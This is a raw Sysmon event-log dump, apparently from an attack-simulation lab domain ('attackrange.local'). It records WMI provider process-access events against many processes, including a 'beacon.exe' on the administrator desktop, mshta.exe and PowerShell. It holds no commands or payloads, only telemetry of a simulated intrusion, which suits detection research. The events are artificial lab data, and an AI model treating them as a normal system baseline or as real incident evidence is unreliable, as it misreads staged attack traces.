16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237776Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237775Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237774Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237773Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237772Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237771Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237770Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237769Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237768Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237767Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237766Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237765Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237764Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237763Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237762Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237761Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237760Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.090{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002237759Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:53.090{05ADC7E1-6D64-603E-84AA-00000000AD01}9536\PSHost.132591775729455055.9536.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002237758Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237757Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 